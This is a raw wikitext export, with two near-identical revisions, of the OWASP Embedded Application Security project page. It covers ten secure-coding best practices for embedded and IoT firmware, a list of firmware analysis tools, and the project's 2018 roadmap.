<br />
==OWASP Embedded Application Security Project ==<br />
<br />
Every year the prevalent use of embedded software within enterprise and consumer devices continues to rise exponentially. With widespread publicity of the Internet of Things (IoT), more and more devices are becoming network connected evidencing how essential it is to create secure coding guidelines for embedded software. Embedded Application Security is often not a high priority for embedded developers when they are producing devices such as routers, managed switches, medical devices, Industrial Control Systems (ICS), VoIP phones, IoT devices, and ATM Kiosks due to other challenges outside of development. Other challenges developers face may include, but are not limited to, the Original Design Manufacturer (ODM) supply chain, limited memory, a small stack, and the challenge of pushing firmware updates securely to an endpoint. The goals of this project are to create a list of best practices, provide practical guidance to embedded developers, and to draw on the existing OWASP resources that can bring application security expertise to the embedded world. It is important to note, each of the items and guidance points listed below are longstanding within software security. This document purely tailors issues that OWASP has previously provided guidance upon (e.g. OWASP Top 10, Mobile Top 10, etc.) to the embedded community. ''Given the prevalence of Linux kernels utilized within embedded devices, all code examples are geared towards a POSIX environment but the principles are designed to be platform agnostic.''<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== Mailing List / Group Communication ==<br />
<br />
[https://groups.google.com/a/owasp.org/forum/?hl=en#!forum/embedded-appsec Embedded Sec Mailing List]<br />
[http://owasp.herokuapp.com/ Please join our OWASP Slack channel; look for the #embeddedappsec]<br />
<br />
== Project Leaders ==<br />
<br />
[https://owasp.org/index.php/User:Aaron.guzman Aaron Guzman] [mailto:aaron.guzman@owasp.org @]<br />
<br><br />
[https://owasp.org/index.php/User:Alex.Lafrenz Alex Lafrenz] [mailto:alex.lafrenz@owasp.org @]<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Internet of Things Project]]<br />
* [[C-Based Toolchain Hardening]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[IoT Firmware Analysis]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
== Releases ==<br />
[https://scriptingxss.gitbooks.io/top-10-embedded-appsec-best-practices/content/ Living Document (GitBook)] <br />
<br />
[https://www.gitbook.com/download/pdf/book/scriptingxss/top-10-embedded-appsec-best-practices Version 1 (2017)]<br />
<br />
Version 2 scheduled for Fall 2018<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Embedded Best Practices =<br />
<br />
= Embedded Top 10 Best Practices =<br />
[https://scriptingxss.gitbooks.io/embedded-application-security-best-practices/content/ Click here to find additional details pertaining to each of the top ten categories listed below]<br />
== E1 – Buffer and Stack Overflow Protection ==<br />
Prevent the use of known dangerous functions and APIs in effort to protect against memory-corruption vulnerabilities within firmware. (e.g. Use of unsafe C functions - strcat, strcpy, sprintf, scanf) Memory-corruption vulnerabilities, such as buffer overflows, can consist of overflowing the stack (Stack overflow) or overflowing the heap (Heap overflow). For simplicity purposes, this document does not distinguish between these two types of vulnerabilities. In the event a buffer overflow has been detected and exploited by an attacker, the instruction pointer register is overwritten to execute the arbitrary malicious code provided by the attacker.<br />
== E2 – Injection Prevention ==<br />
Ensure all untrusted data and user input is validated, sanitized, and/or outputs encoded to prevent unintended system execution. There are various injection attacks within application security such as operating system (OS) command injection, cross-site scripting (E.g. JavaScript injection), SQL injection, and others such as XPath injection. However, the most prevalent of the injection attacks within embedded software pertain to OS command injection; when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or arguments) without validation or proper escaping.<br />
<br />
== E3 – Firmware Updates and Cryptographic Signatures ==<br />
Ensure robust update mechanisms utilize cryptographically signed firmware images upon download and when applicable, for updating functions pertaining to third party software. Cryptographic signature allows for verification that files have not been modified or otherwise tampered with since the developer created and signed them. The signing and verification process uses public-key cryptography and it is difficult to forge a digital signature (e.g. PGP signature) without first gaining access to the private key. In the event a private key is compromised, developers of the software must revoke the compromised key and will need to re-sign all previous firmware releases with the new key.<br />
<br />
== E4 – Securing Sensitive Information ==<br />
Do not hardcode secrets such as passwords, usernames, tokens, private keys or similar variants into firmware release images. This also includes the storage of sensitive data that is written to disk. If hardware security element (SE) or Trusted Execution Environment (TEE) is available, it is recommended to utilize such features for storing sensitive data. Otherwise, use of strong cryptography should be evaluated to protect the data.<br />
If possible, all sensitive data in clear-text should be ephemeral by nature and reside in a volatile memory only.<br />
== E5 – Identity Management ==<br />
User accounts within an embedded device should not be static in nature. Features that allow separation of user accounts for internal web management, internal console access, as well as remote web management and remote console access should be available to prevent automated malicious attacks.<br />
<br />
== E6 – Embedded Framework and C-Based Hardening ==<br />
Limit BusyBox, embedded frameworks, and toolchains to only those libraries and functions being used when configuring firmware builds. Embedded Linux build systems such as Buildroot, Yocto and others typically perform this task. Removal of known insecure libraries and protocols such as Telnet not only minimize attack entry points in firmware builds, but also provide a secure-by-design approach to building software in efforts to thwart potential security threats.<br />
== E7 – Usage of Debug Code and Interfaces ==<br />
It is important to ensure all unnecessary pre-production build code, as well as dead and unused code, has been removed prior to firmware release to all market segments. This includes but is not limited to potential backdoor code and root privilege accounts that may have been left by parties such as Original Design Manufacturers (ODM) and Third-Party contractors. Typically this falls in scope for Original Equipment Manufacturers (OEM) to perform via reverse engineering of binaries. This should also require ODMs to sign Master Service Agreements (MSA) insuring that either no backdoor code is included and that all code has been reviewed for software security vulnerabilities holding all Third-Party developers accountable for devices that are mass deployed into the market.<br />
== E8 – Transport Layer Security ==<br />
Ensure all methods of communication are utilizing industry standard encryption configurations for TLS. The use of TLS ensures that all data remains confidential and untampered with while in transit. Utilize free certificate authority services such as Let’s Encrypt if the embedded device utilizes domain names.<br />
== E9 – Data collection Usage and Storage - Privacy ==<br />
It is critical to limit the collection, storage, and sharing of both personally identifiable information (PII) as well as sensitive personal information (SPI). Leaked information such as Social Security Numbers can lead to customers being compromised which could have legal repercussions for manufacturers. If information of this nature must be gathered, it is important to follow the concepts of Privacy-by-Design.<br />
== E10 – Third Party Code and Components ==<br />
Following setup of the toolchain, it is important to ensure that the kernel, software packages, and third party libraries are updated to protect against publicly known vulnerabilities. Software such as Rompager or embedded build tools such as Buildroot should be checked against vulnerability databases as well as their ChangeLogs to determine when and if an update is needed. It is important to note this process should be tested by developers and/or QA teams prior to release builds as updates to embedded systems can cause issues with the operations of those systems.<br />
Embedded projects should maintain a “Bill of Materials” of the third party and open source software included in its firmware images. This Bill of Materials should be checked to confirm that none of the third party software included has any unpatched vulnerabilities. Up to date vulnerability information may be found through the National Vulnerability Database or Open Hub.<br />
<br />
Several solutions exist for cataloging and auditing third party software:<br />
Retirejs for Javascript projects (free)<br />
Black Duck (paid)<br />
Package Managers (free)<br />
Buildroot (free)<br />
<br />
= Embedded Device Firmware Analysis Tools =<br />
Over the years, embedded security hardware and software tools have been introduced. Some free, some commercially based. If the lists below are missing tools from your arsenal, please feel free to add them. <br />
<br />
=== Hardware ===<br />
* JTagulator [http://www.grandideastudio.com/jtagulator/]<br />
* UART to USB<br />
** Shikra [http://int3.cc/products/the-shikra]<br />
* TTL RS323<br />
* C232HM Cable<br />
* JTAG Adapters<br />
** JLINK<br />
** Jtagulator<br />
** Flyswatter2<br />
* BusPirate<br />
* BusBlaster<br />
* CPLDs (in lieu of FPGAs)<br />
* Oscilloscopes<br />
* Multimeter (Ammeter, Voltmeter, etc)<br />
* Logic Analyzers [https://www.saleae.com/logic16]<br />
* OpenOCD<br />
*GreatFET [https://greatscottgadgets.com/greatfet/]<br />
*Solder station<br />
*Hot air rework gun<br />
*Clips<br />
*Leads<br />
*Headers<br />
*hooks <br />
<br />
=== Software ===<br />
* Angr - [https://github.com/angr/angr]<br />
* Firmadyne [https://github.com/firmadyne/firmadyne]<br />
* Firmwalker [https://github.com/craigz28/firmwalker]<br />
* [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
* Binary Analysis [http://www.binaryanalysis.org/en/content/show/download]<br />
* Flawfinder [https://sourceforge.net/projects/flawfinder/]<br />
* IDA Pro (supports ARM / MIPS)<br />
* Radare2 [https://github.com/radare/radare2]<br />
* Buildroot<br />
* GDB<br />
* Binwalk [http://binwalk.org/]<br />
* Firmware-mod-toolkit [https://code.google.com/archive/p/firmware-mod-kit/]<br />
* Capstone framework [http://www.capstone-engine.org/]<br />
*[https://github.com/fkie-cad/FACT_core Firmware Analysis and Comparison Tool] <br />
*[https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
<br />
= Roadmap =<br />
<br />
== 2018 Roadmap ==<br />
Introductory Embedded Section<br />
* [x] Expand on what embedded firmware is (8,16,32 bit, minimal hardware resources, list embedded use cases and industries)<br />
* [x] Describe types of architectures (MIPS, ARM, PowerPC, x86 etc.)<br />
* [x] Describe types of firmware and operating systems<br />
* [ ] Layout of firmware for embedded linux, RTOS, and Embedded Window<br />
Expand on embedded best practices<br />
* [ ] Secure boot recommendations<br />
** [x] U-boot<br />
* [x] Create examples of software bill of materials (BOM)<br />
* [x] Additional example programming language command injection system calls or APIs<br />
* [ ] Break out subsections for each of the platforms with contextual guidance and configurations<br />
* [ ] Expand on hardening for:<br />
** [ ] Embedded Linux<br />
** [ ] RTOS (QNX/MQX)<br />
* [ ] Best practices/considerations for PKI in embedded systems<br />
Create example embedded application security requirements for new products<br />
* [ ] Integrate with ASVS or create an EASVS (Embedded Application Security Verification Standard)<br />
* [ ] Integrate with the IoT project<br />
Join the mailing list, slack channel (#embeddedappsec) and contact the Project leaders if you feel you can contribute.<br />
<br />
= Contributing =<br />
You do not have to be a security expert in order to contribute!<br />
<br />
Some of the ways you can help:<br />
* Technical editing<br />
* Review<br />
* Diagrams<br />
* Graphic design<br />
* Code snippets in your favorite language<br />
* Translate guidance material<br />
Feel free to sign up for a task out of our roadmap below or add your own idea to the roadmap. To get started, create a GitBook account or sign in with your Github credentials to add comments and make edits. All changes are tracked and synced to <nowiki>https://github.com/scriptingxss/embeddedappsec</nowiki>. Alternatively, clone the Github repo, use your favorite markdown editor, apply/make your edits, and submit a pull request. Feel free to contact the project leaders for ways to get involved.<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Embedded_Application_Security&diff=245201OWASP Embedded Application Security2018-11-16T21:13:30Z<p>Aaron.guzman: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:100px;border:0,margin:0;overflow: hidden;">[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab=Incubator_Projects]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
==OWASP Embedded Application Security Project ==<br />
<br />
Every year the prevalent use of embedded software within enterprise and consumer devices continues to rise exponentially. With widespread publicity of the Internet of Things (IoT), more and more devices are becoming network connected evidencing how essential it is to create secure coding guidelines for embedded software. Embedded Application Security is often not a high priority for embedded developers when they are producing devices such as routers, managed switches, medical devices, Industrial Control Systems (ICS), VoIP phones, IoT devices, and ATM Kiosks due to other challenges outside of development. Other challenges developers face may include, but are not limited to, the Original Design Manufacturer (ODM) supply chain, limited memory, a small stack, and the challenge of pushing firmware updates securely to an endpoint. The goals of this project are to create a list of best practices, provide practical guidance to embedded developers, and to draw on the existing OWASP resources that can bring application security expertise to the embedded world. It is important to note, each of the items and guidance points listed below are longstanding within software security. This document purely tailors issues that OWASP has previously provided guidance upon (e.g. OWASP Top 10, Mobile Top 10, etc.) to the embedded community. ''Given the prevalence of Linux kernels utilized within embedded devices, all code examples are geared towards a POSIX environment but the principles are designed to be platform agnostic.''<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== Mailing List / Group Communication ==<br />
<br />
[https://groups.google.com/a/owasp.org/forum/?hl=en#!forum/embedded-appsec Embedded Sec Mailing List]<br />
[http://owasp.herokuapp.com/ Please join our OWASP Slack channel; look for the #embeddedappsec]<br />
<br />
== Project Leaders ==<br />
<br />
[https://owasp.org/index.php/User:Aaron.guzman Aaron Guzman] [mailto:aaron.guzman@owasp.org @]<br />
<br><br />
[https://owasp.org/index.php/User:Alex.Lafrenz Alex Lafrenz] [mailto:alex.lafrenz@owasp.org @]<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Internet of Things Project]]<br />
* [[C-Based Toolchain Hardening]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[IoT Firmware Analysis]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
== Releases ==<br />
[https://scriptingxss.gitbooks.io/top-10-embedded-appsec-best-practices/content/ Living Document (GitBook)] <br />
<br />
[https://www.gitbook.com/download/pdf/book/scriptingxss/top-10-embedded-appsec-best-practices Version 1 (2017)]<br />
<br />
Version 2 scheduled for Fall 2018<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Embedded Best Practices =<br />
<br />
= Embedded Top 10 Best Practices =<br />
[https://scriptingxss.gitbooks.io/embedded-application-security-best-practices/content/ Click here to find additional details pertaining to each of the top ten categories listed below]<br />
== E1 – Buffer and Stack Overflow Protection ==<br />
Prevent the use of known dangerous functions and APIs in effort to protect against memory-corruption vulnerabilities within firmware. (e.g. Use of unsafe C functions - strcat, strcpy, sprintf, scanf) Memory-corruption vulnerabilities, such as buffer overflows, can consist of overflowing the stack (Stack overflow) or overflowing the heap (Heap overflow). For simplicity purposes, this document does not distinguish between these two types of vulnerabilities. In the event a buffer overflow has been detected and exploited by an attacker, the instruction pointer register is overwritten to execute the arbitrary malicious code provided by the attacker.<br />
== E2 – Injection Prevention ==<br />
Ensure all untrusted data and user input is validated, sanitized, and/or outputs encoded to prevent unintended system execution. There are various injection attacks within application security such as operating system (OS) command injection, cross-site scripting (E.g. JavaScript injection), SQL injection, and others such as XPath injection. However, the most prevalent of the injection attacks within embedded software pertain to OS command injection; when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or arguments) without validation or proper escaping.<br />
<br />
== E3 – Firmware Updates and Cryptographic Signatures ==<br />
Ensure robust update mechanisms utilize cryptographically signed firmware images upon download and when applicable, for updating functions pertaining to third party software. Cryptographic signature allows for verification that files have not been modified or otherwise tampered with since the developer created and signed them. The signing and verification process uses public-key cryptography and it is difficult to forge a digital signature (e.g. PGP signature) without first gaining access to the private key. In the event a private key is compromised, developers of the software must revoke the compromised key and will need to re-sign all previous firmware releases with the new key.<br />
<br />
== E4 – Securing Sensitive Information ==<br />
Do not hardcode secrets such as passwords, usernames, tokens, private keys or similar variants into firmware release images. This also includes the storage of sensitive data that is written to disk. If hardware security element (SE) or Trusted Execution Environment (TEE) is available, it is recommended to utilize such features for storing sensitive data. Otherwise, use of strong cryptography should be evaluated to protect the data.<br />
If possible, all sensitive data in clear-text should be ephemeral by nature and reside in a volatile memory only.<br />
== E5 – Identity Management ==<br />
User accounts within an embedded device should not be static in nature. Features that allow separation of user accounts for internal web management, internal console access, as well as remote web management and remote console access should be available to prevent automated malicious attacks.<br />
<br />
== E6 – Embedded Framework and C-Based Hardening ==<br />
Limit BusyBox, embedded frameworks, and toolchains to only those libraries and functions being used when configuring firmware builds. Embedded Linux build systems such as Buildroot, Yocto and others typically perform this task. Removal of known insecure libraries and protocols such as Telnet not only minimize attack entry points in firmware builds, but also provide a secure-by-design approach to building software in efforts to thwart potential security threats.<br />
== E7 – Usage of Debug Code and Interfaces ==<br />
It is important to ensure all unnecessary pre-production build code, as well as dead and unused code, has been removed prior to firmware release to all market segments. This includes but is not limited to potential backdoor code and root privilege accounts that may have been left by parties such as Original Design Manufacturers (ODM) and Third-Party contractors. Typically this falls in scope for Original Equipment Manufacturers (OEM) to perform via reverse engineering of binaries. This should also require ODMs to sign Master Service Agreements (MSA) insuring that either no backdoor code is included and that all code has been reviewed for software security vulnerabilities holding all Third-Party developers accountable for devices that are mass deployed into the market.<br />
== E8 – Transport Layer Security ==<br />
Ensure all methods of communication are utilizing industry standard encryption configurations for TLS. The use of TLS ensures that all data remains confidential and untampered with while in transit. Utilize free certificate authority services such as Let’s Encrypt if the embedded device utilizes domain names.<br />
== E9 – Data collection Usage and Storage - Privacy ==<br />
It is critical to limit the collection, storage, and sharing of both personally identifiable information (PII) as well as sensitive personal information (SPI). Leaked information such as Social Security Numbers can lead to customers being compromised which could have legal repercussions for manufacturers. If information of this nature must be gathered, it is important to follow the concepts of Privacy-by-Design.<br />
== E10 – Third Party Code and Components ==<br />
Following setup of the toolchain, it is important to ensure that the kernel, software packages, and third party libraries are updated to protect against publicly known vulnerabilities. Software such as Rompager or embedded build tools such as Buildroot should be checked against vulnerability databases as well as their ChangeLogs to determine when and if an update is needed. It is important to note this process should be tested by developers and/or QA teams prior to release builds as updates to embedded systems can cause issues with the operations of those systems.<br />
Embedded projects should maintain a “Bill of Materials” of the third party and open source software included in its firmware images. This Bill of Materials should be checked to confirm that none of the third party software included has any unpatched vulnerabilities. Up to date vulnerability information may be found through the National Vulnerability Database or Open Hub.<br />
<br />
Several solutions exist for cataloging and auditing third party software:<br />
Retirejs for Javascript projects (free)<br />
Black Duck (paid)<br />
Package Managers (free)<br />
Buildroot (free)<br />
<br />
= Embedded Device Firmware Analysis Tools =<br />
<br />
* Angr - [https://github.com/angr/angr]<br />
* Firmadyne [https://github.com/firmadyne/firmadyne]<br />
* Firmwalker [https://github.com/craigz28/firmwalker]<br />
* [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
* Binary Analysis [http://www.binaryanalysis.org/en/content/show/download]<br />
* Flawfinder [https://sourceforge.net/projects/flawfinder/]<br />
* IDA Pro (supports ARM / MIPS)<br />
* Radare2 [https://github.com/radare/radare2]<br />
* GDB<br />
* Binwalk [http://binwalk.org/]<br />
* Firmware-mod-toolkit [https://code.google.com/archive/p/firmware-mod-kit/]<br />
* Capstone framework [http://www.capstone-engine.org/]<br />
* Shikra [http://int3.cc/products/the-shikra]<br />
* JTagulator [http://www.grandideastudio.com/jtagulator/]<br />
* UART cables<br />
* JTAG Adapters (JLINK)<br />
* BusPirate<br />
* BusBlaster<br />
* CPLDs (in lieu of FPGAs)<br />
* Oscilloscopes<br />
* Multimeter (Ammeter, Voltmeter, etc)<br />
* Logic Analyzers [https://www.saleae.com/logic16]<br />
* OpenOCD<br />
*GreatFET [https://greatscottgadgets.com/greatfet/]<br />
*[https://github.com/fkie-cad/FACT_core Firmware Analysis and Comparison Tool] <br />
*[https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
<br />
= Roadmap =<br />
<br />
== 2018 Roadmap ==<br />
Introductory Embedded Section<br />
* [x] Expand on what embedded firmware is (8,16,32 bit, minimal hardware resources, list embedded use cases and industries)<br />
* [x] Describe types of architectures (MIPS, ARM, PowerPC, x86 etc.)<br />
* [x] Describe types of firmware and operating systems<br />
* [ ] Layout of firmware for embedded linux, RTOS, and Embedded Window<br />
Expand on embedded best practices<br />
* [ ] Secure boot recommendations<br />
** [x] U-boot<br />
* [x] Create examples of software bill of materials (BOM)<br />
* [x] Additional example programming language command injection system calls or APIs<br />
* [ ] Break out subsections for each of the platforms with contextual guidance and configurations<br />
* [ ] Expand on hardening for:<br />
** [ ] Embedded Linux<br />
** [ ] RTOS (QNX/MQX)<br />
* [ ] Best practices/considerations for PKI in embedded systems<br />
Create example embedded application security requirements for new products<br />
* [ ] Integrate with ASVS or create an EASVS (Embedded Application Security Verification Standard)<br />
* [ ] Integrate with the IoT project<br />
Join the mailing list, slack channel (#embeddedappsec) and contact the Project leaders if you feel you can contribute.<br />
<br />
= Contributing =<br />
You do not have to be a security expert in order to contribute!<br />
<br />
Some of the ways you can help:<br />
* Technical editing<br />
* Review<br />
* Diagrams<br />
* Graphic design<br />
* Code snippets in your favorite language<br />
* Translate guidance material<br />
Feel free to sign up for a task out of our roadmap below or add your own idea to the roadmap. To get started, create a GitBook account or sign in with your Github credentials to add comments and make edits. All changes are tracked and synced to <nowiki>https://github.com/scriptingxss/embeddedappsec</nowiki>. Alternatively, clone the Github repo, use your favorite markdown editor, apply/make your edits, and submit a pull request. Feel free to contact the project leaders for ways to get involved.<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]]</div>Aaron.guzman